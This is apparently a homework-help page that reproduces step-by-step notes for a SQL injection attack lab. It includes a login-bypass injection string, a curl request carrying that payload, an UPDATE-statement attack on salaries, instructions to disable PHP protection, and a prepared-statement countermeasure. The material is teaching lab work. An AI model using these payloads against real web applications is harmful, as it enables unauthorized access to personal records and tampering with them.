StudyDaddy Article Writing SQL injection is a code injection technique that exploits the vulnerabilities in the interface between a web applications and a database server.  The SQL Injection Attack Lab document with instruction

SQL injection is a code injection technique that exploits the vulnerabilities in the interface between a web applications and a database server.  The SQL Injection Attack Lab document with instruction

Patch VM with SQL lab environment ================================================== 1) download and decompress patch file ------------------- wget http://mars.syr.edu/html/seed/patch.tar.gz tar -zxvf patch.tar.gz 2) test web page URL ----------------- http://www.SEEDLabSQLInjection.com 3) install curl software --------------------- sudo apt-get update sudo apt-get install curl 4) turn off protection ------------------- sudo gedit /etc/php5/apache2/php.ini sudo service apache2 restart Task 1: MySQL Console ================================================== 1) login MySQL Console ------------------- mysql -u root -pseedubuntu 2) show database table ------------------- show databases; use Users; show tables; SELECT * FROM credential; Task 2.1: SQL injection attack via webpage ================================================== 1) SQL injection string -------------------- 'or name='Admin';-- a 2) web application login logic --------------------------- SELECT id, name, eid, salary, birth, ssn, phoneNumber, address, email,nickname,Password FROM credential WHERE eid= '$input_eid' and Password='$input_pwd'; Task 2.2: SQL injection attack via command line ================================================== 1) curl get request ---------------- curl "http://www.seedlabsqlinjection.com/unsafe_credential.php?EID=%27%20or%20name=%27admin%27;--%20&Password=" Task 3.1: SQL Injection Attackk on UPDATE statement --- Modify Employees' Salary ================================================== 1) web application update profile logic ------------------------------------ UPDATE credential SET nickname='',email='',address='' where ID=1; Task 4: Countermeasure - Prepared Statement ================================================== 1) copy prepared statement php and link index.html to new php file --------------------------------------------------------------- sudo cp safe_credential.php /var/www/SQLInjection sudo gedit /var/www/SQLInjection/index.html

Have a similar question?

Continue to edit or attach image(s).

  • Fast and convenient

    Fast and convenient

    Simply post your question and get it answered by professional tutor within 30 minutes. It's as simple as that!

  • Any topic, any difficulty

    Any topic, any difficulty

    We've got thousands of tutors in different areas of study who are willing to help you with any kind of academic assignment, be it a math homework or an article.

  • 100% Satisfied Students

    100% Satisfied Students

    Join 3,4 million+ members who are already getting homework help from StudyDaddy!